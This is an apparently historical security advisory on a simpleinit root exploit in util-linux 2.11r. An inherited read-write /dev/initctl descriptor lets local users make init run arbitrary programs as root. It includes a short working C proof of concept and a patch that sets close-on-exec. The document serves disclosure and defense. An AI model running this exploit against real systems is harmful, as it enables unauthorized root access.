COMMAND

	simpleinit root exploit - file descriptor left open

SYSTEMS AFFECTED

	util-linux 2.11r

PROBLEM

	Patrick Smith [patsmith@pobox.com] found following bug:
	

	Simpleinit is an init program for Linux systems. It is included  in  the
	util-linux distribution. More information about simpleinit is  available
	at
	

	http://www.atnf.csiro.au/people/rgooch/linux/boot-scripts/

	

	

	

	 Problem

	 =======

	

	Simpleinit leaves a file descriptor open in some child processes.
	

	The descriptor is used by  simpleinit  to  read  messages  from  a  FIFO
	(/dev/initctl); this FIFO is normally used by  the  initctl,  need,  and
	provide  programs  to  pass   instructions   to   simpleinit.   However,
	simpleinit opens the FIFO read-write, so any process that  inherits  the
	descriptor can pass instructions to simpleinit.
	

	(Opening the FIFO read-write is not a bug; rather it  ensures  there  is
	always a writer for the FIFO, so EOF is not reported.)
	

	This has been observed in the  simpleinit  from  util-linux  2.11r  (the
	latest version).
	

	

	 Impact

	 ======

	

	A local user with a  process  that  inherits  the  file  descriptor  can
	easily cause simpleinit to execute an arbitrary program or  script  with
	root privileges.  There are assuredly numerous other local exploits.
	

	There may also be some remote exploits. For example, if  an  ftp  server
	allows access to file descriptors through the /proc filesystem.
	

	Not all processes inherit the file descriptors. Getty processes  started
	from lines in /etc/inittab do not, so users logging in  on  the  virtual
	consoles will typically not have access to this exploit.  On  the  other
	hand, if the boot scripts start xdm, then a user logging in through  xdm
	will be able to use the file descriptor.
	

	

	 Exploit

	 =======

	

	

	#include <fcntl.h>

	#include <stdio.h>

	#include <stdlib.h>

	#include <string.h>

	#include <unistd.h>

	

	#include \"simpleinit.h\"  /* From the util-linux source */

	

	int main()

	{

	   int fd = 3;

	   char buf[COMMAND_SIZE];

	   struct command_struct* cmd = (struct command_struct*) buf;

	

	   memset(buf, \'\\0\', sizeof(buf));

	   cmd->command = COMMAND_NEED;

	   cmd->pid = 17;

	   cmd->ppid = 16;

	   strcpy(cmd->name, \"/home/pat/x/foo\");  /* foo will be run as root */

	   write(fd, buf, COMMAND_SIZE);

	   return 0;

	}

	

SOLUTION

	Patch:
	

	

	--- login-utils/simpleinit.c.orig	2001-09-29 11:09:10.000000000 -0400

	+++ login-utils/simpleinit.c	2002-05-23 22:16:07.000000000 -0400

	@@ -203,6 +203,18 @@

	 		if ( ( initctl_fd = open (initctl_name, O_RDWR, 0) ) < 0 )

	 			err ( _(\"error opening fifo\\n\") );

	 	}

	+        if ( initctl_fd >= 0 )

	+                if ( fcntl (initctl_fd, F_SETFD, FD_CLOEXEC) != 0 ) {

	+                        err ( _(\"error setting close-on-exec on /dev/initctl\") );

	+                        /* Can the fcntl ever fail?  If it does, and we leave

	+                           the descriptor open in child processes, then any

	+                           process on the system will be able to write to

	+                           /dev/initctl and have us execute arbitrary commands

	+                           as root. So let\'s refuse to use the fifo in this

	+                           case. */

	+                        close(initctl_fd);

	+                        initctl_fd = -1;

	+                }

	 

	 	if ( want_single || (access (_PATH_SINGLE, R_OK) == 0) ) do_single ();